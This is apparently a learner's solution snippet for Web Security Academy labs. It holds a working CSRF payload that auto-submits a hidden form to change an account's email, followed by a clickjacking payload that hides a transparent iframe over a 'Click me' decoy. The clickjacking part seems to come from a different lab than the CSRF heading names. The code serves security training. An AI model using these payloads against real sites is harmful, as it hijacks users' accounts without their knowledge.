Cross-site request forgery (CSRF)
Lab: CSRF vulnerability with no defenses
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="anything@web-security-academy.net">
</form>
<script>
document.forms[0].submit();
</script>
<style>
iframe {
position:relative;
width:700px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:450px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0a0700e40484434d81eb262a00f20067.web-security-academy.net/my-account?email=test123@test-website.com"></iframe>